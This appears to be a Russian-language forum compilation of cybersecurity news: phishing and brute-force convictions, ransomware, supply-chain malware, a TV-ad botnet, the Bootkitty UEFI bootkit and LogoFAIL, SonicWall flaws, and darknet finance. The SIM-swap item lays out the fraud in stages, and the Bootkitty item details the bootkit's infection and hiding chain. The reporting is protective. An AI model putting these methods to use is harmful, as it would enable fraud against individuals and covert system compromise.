• Source: https://www.tps[.]ca/media-centre/stories/project-disrupt-leads-to- arrests-and-charges/
• Source: https://www.tps[.]ca/media-centre/news-releases/ten-arrests-made- and-115-charges-laid-in-project-d/
В городе Зволле, расположенном в Нидерландах, недавно состоялся суд над 26-летним мужчиной, имя которого не разглашается. Его обвиняют в совершении целого ряда компьютерных преступлений, а также в незаконном хранении оружия.
Как утверждается в обвинительном заключении, «компьютерные преступления» обвиняемого представляют собой разработку и использование специального приложения, предназначенного для осуществления различных цифровых правонарушений. Так, с помощью этого приложения мужчина рассылал фишинговые письма, взламывал учётные записи, похищал личные данные и совершал покупки от имени других лиц.
По данным следствия, в период с марта 2022 года по январь 2024 года обвиняемый использовал своё приложение для отправки фишинговых писем более чем 105 000 человек. Эти письма содержали ссылки на поддельные сайты, побуждающие жертв ввести свои учётные данные. Вся эта информация собиралась, а затем использовалась для несанкционированного доступа к их аккаунтам.
Обвиняемый проникал в электронные почты жертв и устанавливал почтовые правила и фильтры, чтобы скрыть уведомления о финансовых сделках. Затем он совершал покупки от имени жертв и изменял уведомления о платежах и доставках. Это позволяло хакеру заказывать товары на чужие имена и даже получать их, оставаясь незамеченным.
Кражи не ограничивались товарами: обвиняемый также взламывал криптовалютные кошельки. Он использовал фишинговые письма, чтобы получить доступ к криптовалютным аккаунтам жертв, после чего переводил средства на свои счета. Полученные деньги использовались для оплаты аренды серверов, на которых размещалось вредоносное ПО хакера.
Помимо киберпреступлений, обвиняемый был признан виновным в незаконном хранении огнестрельного оружия и боеприпасов. При обыске в его доме было найдено огнестрельное оружие марки Beretta и патроны к нему.
По итогу, суд признал мужчину виновным по всем предъявленным обвинениям, включая изготовление вредоносного ПО, кражу личных данных и биткойнов, а также незаконное хранение огнестрельного оружия и боеприпасов. В результате преступник был приговорён к трём годам тюрьмы, из которых один год он будет отбывать условно. Суд также обязал мужчину выплатить компенсацию жертвам в размере 10 580 евро (свыше миллиона рублей).
В наше время грань между виртуальным и реальным становится всё более размытой, а киберпреступления, кажущиеся безобидными манипуляциями с кодом, могут иметь разрушительные последствия для жизней реальных людей. Случай с голландским киберпреступником демонстрирует, что продвинутая технологическая грамотность без этического компаса может привести к серьёзным проблемам и даже сломанным жизням.
• Source: https://linkeddata[.]overheid.nl/front/portal/document-viewer?ext- id=ECLI:NL:RBOVE:2024:3924
Специалисты компании Arctic Wolf [сообщают](https://arcticwolf.com/resources/blog/conti-and-akira-chained- together/) , что новая программа-вымогатель Akira имеет влияние на малый и средний бизнес по всему миру, при этом основная активность замечена в США и Канаде.
С момента обнаружения Akira в марте 2023 года насчитывается не менее 63 случаев компрометации. Важным открытием стало то, что вирус Akira имеет связи с хакерами из группировки Conti.
Анализ криптовалютных транзакций Akira и Conti показал, что в трех отдельных случаях участники Akira перевели более $600 000 на адреса, связанные с Conti. Отсюда эксперты Arctic Wolf сделали вывод – лицо, контролирующее адрес получателя, является либо бывшим участником распавшейся Conti , либо сотрудничает с обеими группами одновременно.
Соответствия в коде Akira и Conti трудно отследить с момента утечки исходного кода Conti в прошлом году. Однако исследователи уверены, что Akira очень похож на программу-вымогатель Conti: Akira игнорирует те же типы файлов и каталогов, и использует схожий алгоритм шифрования.
Активные проникновения Akira на компьютерные системы под управлением Windows и Linux осуществляются через VPN- сервисы, особенно там, где пользователи не активировали двухфакторную аутентификацию (2FA). После заражения Akira удаляет резервные папки, которые могут быть использованы для восстановления потерянных данных. Далее программа-вымогатель шифрует файлы с определенными расширениями.
Требования выкупа хакеров Akira варьируются от $200,000 до более $4 млн. Группировка обещает восстановить доступ к данным в течение 24 часов после получения выкупа, угрожая продажей личных данных и коммерческих секретов в случае отказа.
Ростовский областной суд вынес обвинительный приговор в отношении бывшего инженера предприятия оборонно-промышленного комплекса (ОПК), взломавшего компьютер по месту своей работы. ИТ-инженер, находясь по месту работы, отключил средство защиты компьютерной информации программно-технического комплекса.
Осужден за ИТ-взлом
Ростовский областной суд оставил без изменения приговор бывшему сотруднику предприятия ОПК Валерию Шабурову, приговоренному к трем годам колонии за неправомерное воздействие на информационную инфраструктуру предприятия. Об этом 5 июня 2024 г. сообщила пресс-служба Управления Федеральной службы безопасности (ФСБ) России по Ростовской области.
По информации ФСБ, инженер одного из донских предприятий ОПК намеревался влезть в базу данных (БД) компании. Находясь на работе, ИТ-инженер нейтрализовал средство защиты компьютерной информации программно-технического комплекса, планируя копировать данные о процессе производства для их последующего изменения.
В отношении Валерия Шабурова было возбуждено уголовное дело по части 4 статьи 274.1 УК РФ («Неправомерное воздействие на критическую информационную инфраструктуру (КИИ) России»).
Каменский районный суд признал Валерия Шабурова виновным в совершении преступления, предусмотренного частью 4 статьи 274.1, а также назначил ему наказание в виде трех лет лишения свободы с отбыванием в исправительной колонии общего режима, с лишением права заниматься деятельностью, связанной с доступом к КИИ России, сроком на два года. Ростовский областной суд в начале июня 2024 г. оставил приговор без изменений.
Критическая информационная инфраструктура
Под критической информационной инфраструктурой подразумевается совокупность автоматизированных систем управления производственными и технологическими процессами критически важных объектов России и обеспечивающих их взаимодействие информационно-телекоммуникационных сетей, а также ИТ-систем и сетей связи, предназначенных для решения задач государственного управления, обеспечения обороноспособности, безопасности и правопорядка.
В начале мая 2024 г. Федеральная служба по техническому и экспортному контролю (ФСТЭК) обнародовала методику оценки показателя состояния технической защиты информации и обеспечения безопасности значимых объектов КИИ России. Правила распространяются на госорганы, организации в области связи, энергетики, банковской сферы и предприятия других значимых отраслей экономики.
В документе ФСТЭК говорится о том, что методика определяет показатель, характеризующий текущее состояние технической защиты информации, не составляющей государственную тайну, и (или) обеспечения безопасности значимых объектов КИИ. Оценка должна осуществляться не реже одного раза в шесть месяцев. Внеочередную проверку защищенности организациям необходимо проводить в случае возникновения инцидента информационной безопасности с негативными последствиями или при изменении архитектуры информационных систем. Кроме того, такая проверка может быть инициирована по запросу ФСТЭК.
Исходными данными, необходимыми для оценки показателя защищенности, могут быть: отчеты, протоколы или иные документы, составленные по результатам внутреннего контроля уровня безопасности; результаты проведения инвентаризации информационных систем; внутренние организационно-распорядительные документы, регламентирующие организацию защиты информации; отчеты, составленные по результатам внешней оценки. В ФСТЭК отдельно разъяснили, что могут учитываться результаты опроса работников организации о выполнении ими функций с использованием информационных систем (ИС) и (или) по обеспечению информационной безопасности (ИБ).
Законодательство
В целях формирования нормативной базы в части уголовной ответственности за нарушения закона о КИИ законодатель внес изменения в Уголовный кодекс (УК) России, принятием отдельного Федерального закона N 194-ФЗ от 26.07.2017 «О внесении изменений в отдельные законодательные акты России в связи с принятием Федерального закона «О безопасности критической информационной инфраструктуры Российской Федерации». Статья 274.1. Неправомерное воздействие на КИИ России.
В третьей части говориться о том, что нарушение правил эксплуатации средств хранения, обработки или передачи охраняемой компьютерной информации, содержащейся в КИИ России, или ИС, информационно-телекоммуникационных сетей, автоматизированных систем управления, сетей электросвязи, относящихся к КИИ России, либо правил доступа к указанным информации, информационным системам, информационно-телекоммуникационным сетям, автоматизированным системам управления, сетям электросвязи, если оно повлекло причинение вреда КИИ России,
В четвертой части сообщается, что деяния, предусмотренные частью первой, второй или третьей настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой, или лицом с использованием своего служебного положения, — наказываются лишением свободы на срок от трех до восьми лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
Пятая часть гласит, что деяния, предусмотренные частью первой, второй, третьей или четвертой настоящей статьи, если они повлекли тяжкие последствия, наказываются лишением свободы на срок от пяти до десяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет или без такового.
Аналитики «Доктор Веб» и «Лаборатории Касперского» сообщают, что официальный клиент альтернативного магазина Android-приложений APKPure был заражен малварью.
Трон-дроппер проник в рекламный SDK приложения, и был найден в клиенте APKPure версии 3.17.18, который распространялся через официальный сайт площадки. Приложение было подписано действительной цифровой подписью владельцев каталога.
Исследователи пишут, что APKPure, похоже, повторил судьбу популярного приложения CamScanner. В 2019 году разработчик внедрил в CamScanner рекламный SDK из непроверенного источника, и в итоге миллионы пользователей пострадали от малвари.
В случае APKPure вредонос был способен показывать рекламу при разблокировке устройства, периодически открывать браузер с рекламными страницами, загружать дополнительные исполняемые модули. Исследователи наблюдали, как при помощи APKPure был загружен троян, похожий на малварь семейства Triada, обладающий обширными возможностями: от показа и прокликивания рекламы до оформления платных подписок и загрузки других вредоносов.



Если же зараженное устройство было старым, с Android 6 или 7 на борту, где получит root-права совсем нетрудно, мог загрузиться и троян xHelper, который позволяет злоумышленникам делать на устройстве практически все, что им заблагорассудится.
Заражение было обнаружено в конце марта, начале апреля 2021 года, и, по информации «Лаборатории Касперского», в компании APKPure подтвердили наличие проблемы и оперативно выпустили версию 3.17.19, в которой она устранена. Сколько пользователей успели пострадать от вредоносной версии APKPure, неизвестно.
Источник: xakep.ru/2021/04/12/apkpure/
Эксперты компании Human Security (ранее White Ops) обнаружили ботнет Pareto, который заражает устройства на Android и использует их для мошенничества в экосистеме телевизионной рекламы. В настоящее время Pareto заразил уже более миллиона устройств и выдает себя за миллионы людей, просматривающих рекламу на «умных» телевизорах и других девайсах.
Заражённое Pareto приложение
Human Security сообщает, что ботнет использовал десятки мобильных приложений для имитации или подделки более 6000 приложений Connected TV (CTV), и в среднем он обрабатывает более 650 000 000 рекламных запросов в день.
Вреднос успешно выдает себя за потребительские продукты для потокового ТВ, работающие под управлением Fire OS, tvOS, Roku OS и других известных CTV- платформ.
«Этот подход является весьма прибыльным для мошенников, поскольку цены на рекламу на CTV часто значительно выше, чем на мобильных устройствах или в интернете», — объясняют в компании.
Click to expand...
Впервые эксперты заметили этот мобильный ботнет еще в прошлом году, и теперь работают над устранением угрозы, сотрудничая со специалистами Google, Roku и так далее. Справиться с ботнетом сложно, так как за последний год его операторы не раз меняли механики спуфинга и придумывали новые способы маскировки для поддельного трафика.
Источник: xakep.ru/2021/04/23/pareto/
В России набирает обороты новый вид мошенничества с сим-картами, который позволяет хакерам получить доступ к номеру телефона и моментально переводить деньги из банковских приложений. В новой схеме скомбинированы несколько ранее известных, причем это тот случай, когда обман сложно доказать, следует из обзора компании ESET, занимающейся разработкой антивирусных решений (материалы распространило агентство «Пиархаб»).
Первый этап работы мошенников — создание фейкового аккаунта. «На черном рынке покупаются неживые аккаунты, которые на первый взгляд не отличаются от настоящих: созданы несколько лет назад, есть фото, не засвеченные в поиске по картинкам Google и «Яндекса», контент редко, но обновляется. Создается видимость принадлежности аккаунта живому человеку», — указывают в ESET.
На следующем этапе злоумышленники подбирают жертв атаки социальной инженерии с помощью рекламного кабинета и поиска в Facebook и Instagram, причем ищут они не пенсионеров или блогеров с большим количеством подписок, а предпринимателей, владельцев бизнеса. У этой группы жертв есть деньги, и они не избалованы вниманием, поясняют эксперты.
Третий этап — попытка выяснить номер телефона. Выглядит это так: «Жертве пишет красивая и обязательно одинокая девушка. Нередко она живет в другом городе, но имеет с объектом обмана немного общего (заканчивала тот же вуз, у них совпадают хобби и пр.). Далее мошенник под аккаунтом дружелюбной собеседницы пытается выяснить номер телефона вступившего в переписку. Например, пытается перевести общение в WhatsApp, где всегда виден номер мобильного. Это нужно ради изготовления дубликата сим-карты».
На четвертом этапе изготавливается дубликат сим-карты жертвы. Злоумышленник, получив номер телефона и определив, какому оператору он принадлежит, делает необходимую для этого поддельную доверенность, причем чаще всего заявление на получение дубликата сим-карты подается в небольшом филиале оператора в другом конце страны и часовом поясе.
Заключительный этап — перевод средств. «Получив сим-карту, мошенник сразу обращается в банк, чтобы восстановить пароль от банковского приложения — через кол-центр или в скачанном мобильном банке. Последний рубеж обороны — аутентификация по личному номеру — пройден. Далее происходит перевод всех денег на другой банковский счет», — предупреждают в ESET.
По данным компании, в дополнение аферисты нередко пишут в мессенджерах друзьям и родственникам жертвы, что срочно нужны деньги. Если кто-то переводит средства по привычному номеру на знакомую карту, то их списывают еще раз.
«С точки зрения банков — это даже не мошенничество. Потому что двухфакторные авторизации на сим-картах являются подтверждением личности. Если перевели деньги с помощью вашей сим-карты, значит, это сделали вы. Выходит, что современная сим-карта оказывается важнее и весомее паспорта, а ее кража — опаснее утери основного документа гражданина страны. Все ваши аккаунты, все социальные сети, мессенджеры, банки, сервисы доставки и такси — буквально все завязано на личный номер телефона», — комментирует обозреватель ESET Станислав Жураковский.
Эксперты ESET рекомендуют предпринять несколько шагов, чтобы избежать подобного обмана и не дать мошенникам шанса заполучить сим-карту.
Так, в приложении мобильного оператора необходимо выпустить второй виртуальный номер. «Этот номер будет привязан к основному. СМС будут приходить на основной номер, как и звонки. Стоимость услуги минимальная, но она позволяет получить секретный для всех номер телефона, к которому можно привязать чувствительные сервисы, такие как банки и социальные сети», — рассказывают специалисты.
Кроме того, рекомендуется переключить во всех банках СМС-авторизацию на пуши в приложении: такой способ безопаснее и позволяет получать коды для операций через Интернет, даже если нет самой сим-карты.
Также в ESET советуют подготовить «запрет передоверенности» в офисе мобильного оператора. Такой документ позволяет запретить выдавать дубликат сим-карты без личного присутствия по доверенности. «Это самая уязвимая брешь в персональной безопасности, и стоит устранить ее как можно скорее. Понадобится регулярно продлевать срок действия документа», — подчеркивают в антивирусной компании.
«Не стоит давать номера телефонов малознакомым людям. Лучше вести переписку в зашифрованных мессенджерах, а также давать ссылки на аккаунты или никнеймы, которые не привязаны к номеру личного мобильного телефона», — добавляют в ESET.
Исследователи из компании ESET [выявили](https://www.welivesecurity.com/en/eset-research/bootkitty-analyzing- first-uefi-bootkit-linux/) новый буткит Bootkitty, устанавливаемый после взлома системы вместо загрузчика GRUB и применяемый для подстановки в ядро Linux вредоносных компонентов, которые затем позволяют атакующему скрыто контролировать систему и выполнять в ней свои действия. Утверждается, что это первый UEFI-буткит, нацеленный на поражение систем Linux.
Bootkitty размещается в файле grubx64.efi в системном разделе EFI (EFI system partition, /boot/efi/EFI/ubuntu) вместо штатного загрузчика GRUB. После активации UEFI-прошивкой буткит загружает в память реальный загрузчик GRUB2 и вносит в размещённый в памяти код GRUB2 изменения, отключающие проверку целостности компонентов, загружаемых в дальнейшем, а также добавляет обработчик, вызываемый после распаковки образа ядра Linux в память. Указанный обработчик вносит изменения в загруженные в память функции ядра (отключает проверку модулей по цифровой подписи), а также изменяет строку запуска процесса инициализации с "/init" на "LD_PRELOAD=/opt/injector.so /init)".
Библиотека injector.so перехватывает некоторые операции SELinux и функцию init_module, которая затем используется для загрузки модуля ядра /opt/dropper.ko. Модуль ядра dropper.ko создаёт и запускает исполняемый файл /opt/observer, затем скрывает себя в списке модулей ядра и выставляет обработчики системных вызовов, таких как getdents и tcp4_seq_show, для скрытия файла /opt/observer и определённого сетевого трафика. Исполняемый файл /opt/observer загружает модуль ядра /opt/rootkit_loader.ko, который является загрузчиком руткита /opt/rootkit.
Для установки буткита требуется привилегированный доступ к системе и обычно
подобные виды вредоносного ПО используются атакующими после успешного взлома
или компрометации системы для закрепления своего дальнейшего присутствия и
скрытия осуществляемой вредоносной активности. Библиотека injector.so и
вредоносные модули ядра помещаются в образ начального RAM-диска или файловую
систему атакующим. Загрузчик grubx64.efi размещается в раздел с файлами для
UEFI.
В варианте Bootkitty, попавшем в руки исследователей, модификация функций в памяти ядра производилась по заранее определённым смещениям без проверки корректности этих смещений для загруженной версии ядра. используемые в Bootkitty смещения были применимы лишь к версиям ядра и GRUB, поставляемым в определённых выпусках Ubuntu, а в остальных системах приводили к сбою при загрузке. Для верификации загрузчика Bootkitty (grubx64.efi) использовался самоподписанный сертификат, что не позволяло применять буткит на системах с включённым режимом UEFI Secure Boot без установки сертификата атакующего в список заслуживающих доверия сертификатов в UEFI. Подобные особенности натолкнули исследователей на мысль, что Bootkitty лишь прототип буткита, пока не применяемый для реальных атак.
Изучив опубликованную ESET информацию исследователи из компании Binarly REsearch [заметили](https://www.binarly.io/blog/logofail-exploited-to-deploy- bootkitty-the-first-uefi-bootkit-for-linux) среди связанных с Bootkitty артефактов BMP-изображения, используемые для эксплуатации уязвимости LogoFAIL, позволяющей выполнить код на уровне UEFI-прошивки и обойти механизм UEFI Secure Boot. В контексте Bootkitty эксплуатация уязвимости LogoFAIL применялась для добавления в список одобренных сертификатов UEFI самоподписанного сертификата атакующего, которым заверен загрузчик буткита grubx64.efi, что позволяло запустить буткит на системах c активным UEFI Secure Boot без добавления сертификата вручную.
Атака осуществляется через размещение в разделе ESP (EFI System Partition) специально оформленного изображения в формате BMP для его вывода UEFI- прошивкой в качестве логотипа производителя. Из-за использования в UEFI- прошивках уязвимых библиотек для работы с изображениями, обработка специально оформленного изображения может привести к переполнению буфера и выполнению кода с привилегиями прошивки UEFI. Уязвимость LogoFAIL была выявлена год назад и затрагивала UEFI-прошивки, среди прочего используемые на ноутбуках Acer, HP, Fujitsu и Lenovo. В новых версиях UEFI-прошивок проблема устранена, но многие находящиеся в обиходе устройства продолжают работать с уязвимыми версиями прошивок.
Как черный рынок отреагировал на смерть «КИВИ Банка»
21 февраля Банк России отозвал лицензию на осуществление банковских операций у «КИВИ Банка». Регулятор принял такое решение, так как организация нарушала законодательство в области противодействия отмыванию полученных преступным путем доходов.
С момента отзыва лицензии клиенты «КИВИ Банка» потеряли в том числе контроль над основным продуктом учреждения — QIWI-кошельками. Теперь их нельзя ни пополнять, ни выводить с них деньги.
В банке было открыто порядка 15 млн кошельков. На них, по оценкам АСВ, скопилось около 4,4 млрд рублей. Все эти средства не были застрахованы. Согласно заявлению регулятора, деньги, зависшие на кошельках, будут возвращаться за счет взыскания и продажи имущества и активов банка.
Главным достоинством QIWI-кошельков для участников нелегальных финансовых операций или людей, оказывающих откровенно криминальные услуги, была возможность анонимного открытия счета. Поэтому отзыв лицензии «КИВИ Банка» стал одним из самых обсуждаемых событий в тематических блогах и на форумах русскоязычного даркнета.
КИВИ являлся важным платежным средством в ру-дарке (российском сегменте даркнета, — прим. ред.): во времена самых первых площадок для покупки запрещенных веществ, именно его выбрали как основную платежную систему
Click to expand...
— рассказывает в своем блоге один из наркоблогеров.
КИВИ был основным способом оплаты покупки психоактивных веществ в даркнете, наверное, вплоть до 2021 года. Напомню: это самые светлые и жирные времена для трехголовой (речь о ликвидированном в 2022 году даркнет-сайте «Гидра», являвшемся монополистом наркорынка на территории СНГ, — прим. ред.). И КИВИ рубила проценты с этих продаж на своих комиссиях, как бы состоя в доле с площадкой. Само собой — выражение образное
Click to expand...
— объясняет пользователь даркнета, не понаслышке знакомый с тонкостями работы наркомаркетплейсов.
После ликвидации «Гидры» популярность «КИВИ» в даркнет-пространстве окончательно сошла на нет — сходятся во мнении все комментаторы.
Вместе с популяризацией криптовалюты у черного рынка появился новый инструментарий для сохранения анонимности при совершении денежных операций.
Сегодня криптообменники идут дальше и используют куда более прогрессивные методы оплаты, маскируемые под деятельность ИП, платящих налоги и скрывающихся за ширмой легальных бизнесов. Из-за чего простые переводы на карту, SIM и уж тем более Киви, уходят в прошлое. Сначала введенные лимиты, а потом и отозванная ЦБ РФ лицензия окончательно похоронили сервис. Искренне удивлен, что до недавнего времени там еще оставались люди, которые хранили на Киви средства, когда банальное использование дроп-карты (банковские карты, открытые на подставных лиц, — прим. ред.) является намного более безопасным с точки зрения сохранности денег
Click to expand...
— описывает современную практику теневых финансовых расчетов один из пользователей даркнета.
На прошлой неделе мы сообщали о том, что австралийская компания Click Studios, стоящая за разработкой менеджера паролей Passwordstate, уведомила своих клиентов о взломе.
Passwordstate — локальное решение для управления паролями, которым, согласно официальной статистике разработчиков, пользуются более 370 000 ИБ- и ИТ- специалистов в 29 000 компаниях по всему миру.
В письме, которое получили все компании-клиенты Passwordstate, сообщалось, что инцидент произошел между 20 и 22 апреля 2021 года. Компания пострадала от атаки на цепочку поставок: злоумышленники распространили среди пользователей Passwordstate вредоносное обновление и в итоге заразили их машины малварью Moserware.
К сожалению, эта малварь успела передать на сервер преступников следующие данные пользователей: имя компьютера, имя пользователя, имя домена, имя текущего процесса, идентификатор текущего процесса, имя и идентификатор всех запущенных процессов, имена всех запущенных служб, отображаемое имя и статус, адрес прокси-сервера Passwordstate, имя пользователя и пароль.
То есть хранилище паролей Passwordstate было скомпрометировано, и разработчики писали, что обычно в таблице паролей содержатся хедер, имя пользователя, описание, GenericField1, GenericField2, GenericField3, примечания, URL и сам пароль.
После сообщения об инциденте Click Studios оказывает помощь пострадавшим по почте, предоставляя клиентам исправления, призванные удалить вредоносное ПО из их систем. Так как эти письма от Click Studios можно было найти в социальных сетях, ими не преминули воспользоваться злоумышленники.
Хакеры создали фишинговые копии посланий Click Studios, и принялись рассылать их некоторым пострадавшим клиентам, продвигая таким образом малварь Moserpass.
«Судя по всему, злоумышленники активно отслеживают социальные сети в поисках любой информации о взломе и эксплуатации. Важно, чтобы клиенты не публиковали в социальных сетях информацию, которая может быть использована злоумышленниками. Именно это произошло перед появлением фишинговых писем, которые копируют содержимое писем Click Studios. Если вы не уверены, что письмо пришло от нас, отправьте его в службу технической поддержки в виде вложения, — предупреждают представители компании в новом сообщении. — Фишинговая атака строится на том, что клиенты должны загрузить модифицированный файл исправления Moserware.zip из сети CDN, не контролируемой Click Studios (которая теперь, похоже, отключена). Первоначальный анализ показывает, что это недавно измененная версия вредоносного Moserware.dll, который при загрузке пытается использовать альтернативный сайт для получения пейлоада. Мы все еще анализируем этот файл полезной нагрузки».
Click to expand...
Источник: xakep.ru/2021/04/29/passwordstate-phishing/
Microsoft опубликовала на GitHub исходный код MS-DOS 4.00, двоичные файлы, образы дисков и документацию на эту операционную систему. 45-летний код выпущен под лицензией MIT, что даёт разработчикам полную свободу действий. Четвёртая версия MS-DOS 4.00 любопытна тем, что была написана в сотрудничестве с IBM, демонстрировала зачатки многозадачности и образовала ветвь DOS под названием Multitasking DOS (или MT- DOS), распространение которой было ограничено.
Выпуск исходного кода MS-DOS 4.00 состоялся благодаря сотрудничеству между бывшим техническим директором Microsoft Рэем Оззи (Ray Ozzie) и компьютерным исследователем Коннором Хайдом (Connor Hyde). Весь код и остальные материалы, которые теперь доступны на GitHub, были сохранены Оззи. Работая в Lotus, он заархивировал несколько неизданных двоичных бета-версий MS-DOS 4. В сохранении исторического наследия также приняли участие вице-президент сообщества разработчиков Microsoft Скотт Хансельман (Scott Hanselman) и интернет-архивист и энтузиаст Джефф Спонагл (Jeff Sponaugle). Перед опубликованием исходного кода ОС энтузиасты получили все необходимые разрешения от правообладателя.
Самым интересным в этой версии MS-DOS являются некоторые зачатки многозадачности, которые, как утверждает Хайд, позднее легли в основу IBM OS/2. Одной из ключевых частей предполагаемого многозадачного рабочего процесса MS-DOS 4.00 является менеджер сеансов SM.EXE. Этот системный компонент позволяет переключаться с помощью горячих клавиш между шестью заранее заданными приложениями. Однако тесты Хайда выявили серьёзные ошибки в его работе. Более подробно о многозадачности в MS-DOS 4.00 и обо всех утилитах, поставляемых с этой версией, можно прочитать в блоге Хайда.

Источник изображения: Connor ‘Starfrost’ Hyde
Ассемблерный код Intel 8086 MS-DOS 4.00, двоичные файлы, образы дисков и документация размещены на GitHub. Образы дисков находятся в каталоге v4.0-ozzie/bin. Энтузиасты, имеющие исправное старое оборудование, могут запустить ОС в исходном виде. Для запуска на современных ПК понадобится эмулятор, например, PCem или 86box с открытым исходным кодом. Кстати, в том же репозитории GitHub хранится исходный код MS- DOS 1.25 и 2.0.
© [https://3dnews.ru/1103917/45-let-sp...dniy-kod-msdos-400-i-razmestila-ego- na-github](https://3dnews.ru/1103917/45-let-spustya-microsoft-otkrila- ishodniy-kod-msdos-400-i-razmestila-ego-na-github)
Правоохранители объявили подозрение трем членам организованной преступной группы, которые присваивали чужие электронные почтовые ящики и аккаунты в Instagram. Фигурантам грозит до 15 лет лишения свободы.
Киберполицейские Харьковщины совместно со следователями ГУНП области под процессуальным руководством Харьковской областной прокуратуры установили трех злоумышленников в возрасте от 20 до 40 лет, которые похищали учетные записи электронной почты и аккаунты социальной сети Instagram пользователей интернета.
Фигуранты действовали методом брутфорса, то есть подбора пароля путём перебора большого количества парольных фраз с применением специального программного обеспечения. Обезопасить свой аккаунт от такого способа взлома можно с помощью настройки двухфакторной аутентификации и использования надежных паролей.
Предварительно установлено, что за год преступной деятельности члены группировки сформировали базы похищенных учетных записей более 100 миллионов пользователей интернета со всего мира. Информация будет проверяться в ходе расследования.
Фигуранты жили в разных регионах Украины и контактировали между собой через интернет. Организатор распределял обязанности между исполнителями, а последние формировали базы взломанных аккаунтов и выставляли их для продажи в даркнете.
По оперативной информации, клиентами злоумышленников в теневом сегменте интернета были преимущественно мошеннические группировки. Эти сообщества покупали скомпрометированные учетные записи для использования в различных мошеннических схемах, в том числе «Друг просит взаймы».
Правоохранители провели 7 обысков по местам проживания и регистрации фигурантов на территории Киева, Одессы, Винницы, Ивано-Франковска, а также Киевской, Донецкой и Кировоградской областей. Изъято более 70 единиц компьютерной техники, 14 телефонов, банковские карты и наличные, в том числе более 3000 долларов США. В суд направлено ходатайство о наложении ареста на изъятое имущество.
Следователи объявили трем членам группировки подозрение по ч. 3 ст. 28, ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины. Им грозит до 15 лет лишения свободы.
Сейчас полицейские направили в суд ходатайство об избрании подозреваемым меры пресечения в виде содержания под стражей.
Также, отрабатывается версия сотрудничества фигурантов с агентами страны- агрессора, поскольку похищенные аккаунты, в частности, использовались для проведения ИПСО в интересах РФ.
Следственные действия продолжаются. По результатам возможна дополнительная квалификация.
Исследователи обнаружили, что более 178 000 межсетевых экранов SonicWall, интерфейс управления которых доступен через интернет, уязвимы для атак типа отказ в обслуживании (DoS) и удаленного выполнения произвольного кода (RCE).
Специалисты Bishop Fox [рассказали](https://bishopfox.com/blog/its-2024-and- over-178-000-sonicwall-firewalls-are-publicly-exploitable), что устройства подвержены двум DoS-уязвимостям ([CVE-2022-22274](https://psirt.global.sonicwall.com/vuln- detail/SNWLID-2022-0003) и [CVE-2023-0656](https://www.sonicwall.com/support/product- notification/product-notice-unauthenticated-stack-based-buffer-overflow- vulnerability-in-sonicos/230215102147553/)), первая из которых также позволяет злоумышленникам удаленно выполнить код.
«Используя BinaryEdge, мы просканировали межсетевые экраны SonicWall с интерфейсами управления, открытыми для доступа через интернет, и обнаружили, что 76% из них (178 637 из 233 984) уязвимы к одной или обеим указанным проблемам», — сообщают в компании.
Click to expand...
Хотя обе уязвимости одинаковы по сей сути, так как вызваны повторным использованием одного и того же уязвимого шаблона кода, они могут использоваться с разными путями HTTP URI.
«Наше исходное исследование подтвердило заявления производителя об отсутствии эксплоита, однако, обнаружив уязвимый код, мы выяснили, что год спустя об этой же проблеме было объявлено как о CVE-2023-0656, — рассказывают эксперты. — Мы обнаружили, что CVE-2022-22274 вызвана тем же уязвимым шаблоном кода, использованным в другом месте, и эксплоит сработал против трех дополнительных путей URI».
Click to expand...
Отмечается, что даже если злоумышленники не смогут выполнить код на целевом устройстве, они могут использовать уязвимости, чтобы перевести девайс в режим обслуживания, после чего для восстановления его работоспособности потребуется вмешательство администратора. То есть атакующие в любом случае могут использовать уязвимости для отключения пограничных межсетевых экранов и VPN- доступа к корпоративным сетям, который те предоставляют.
Хотя специалисты SonicWall Product Security Incident Response Team (PSIRT) утверждают, что у них нет данных об использовании этих уязвимостей хакерами, известно, что эксплоит для CVE-2022-22274 уже свободно доступен в сети.
«SSD Labs опубликовала технический отчет об ошибке, содержащий proof of concept и два пути URI, где ошибка может быть использована», — объясняют специалисты Bishop Fox.
Click to expand...
В итоге администраторам рекомендуется убедиться, что интерфейс управления для их устройств SonicWall не доступен из интернета, а также как можно скорее обновить прошивку до последних версий.
По информации [Shadowserver](https://dashboard.shadowserver.org/statistics/iot-devices/time- series/?date_range=7&vendor=sonicwall&type=firewall&group_by=geo&style=stacked), более 500 000 межсетевых экранов SonicWall в настоящее время доступны через интернет, и из них более 328 000 находятся в США.
[](https://xakep.ru/wp- content/uploads/2024/01/447542/Internet-exposed-SonicWall-firew.jpg)
Пара признала свою вину в организации крупной схемы обмана дилеров Avaya.
Системный администратор со своей супругой признались в организации группировки, которая продавала лицензии на программное обеспечение Avaya на сумму $88 млн. по заниженным ценам.
Брэд и Дасти Пирс признались в заговоре с целью совершения мошенничества с использованием средств связи, и каждому грозит максимальное наказание в виде 20 лет тюрьмы. У семейной пары также были конфискованы как минимум $4 млн., а также золото, серебро, коллекционные монеты, криптовалюта и автомобиль. Кроме того, преступников обязали «полностью возместить ущерб своим жертвам».
Пирсы обвинены в продаже пиратских лицензий на телефонную систему Avaya для бизнеса. Лицензии использовались для активации функций популярной телефонной системы Avaya, которую используют тысячи компаний по всему миру.
Как сообщает Минюст США, 46-летний житель Оклахомы Брэд Пирс, долгое время работавший в техподдержке Avaya, использовал свой доступ системного администратора для несанкционированного генерирования ключей лицензии программного обеспечения ADI на десятки миллионов долларов.
Программное обеспечение ADI (Avaya Direct International) представляет собой систему лицензирования, используемую для разблокировки функций популярной телефонной системы, которую применяют тысячи компаний по всему миру. Эта система лицензирования позволяет контролировать доступ к защищенному авторским правом программному обеспечению Avaya и гарантировать, что только клиенты, оплатившие программное обеспечение, могут его использовать.
Пирс продавал лицензии своему крупнейшему клиенту, реселлеру Avaya Джейсону Хайнсу, и другим подельникам, которые затем перепродавали их дилерам и пользователям по всему миру. Согласно материалам дела, Хайнс купил более 55% украденных лицензий, и существенно влиял на то, как работала схема. Бухгалтерией занималась 44-летняя жена Дасти Пирс, хотя она признала вину только в мошенничестве.
source: justice[.]gov/opa/pr/computer-system-administrator-and-spouse-plead- guilty-massive-scheme-sell-pirated-business
Гомельчанка оформила на свое имя несколько платежных карт и стала фигуранткой 11 уголовных дел, сообщили БЕЛТА в УВД Гомельского облисполкома.
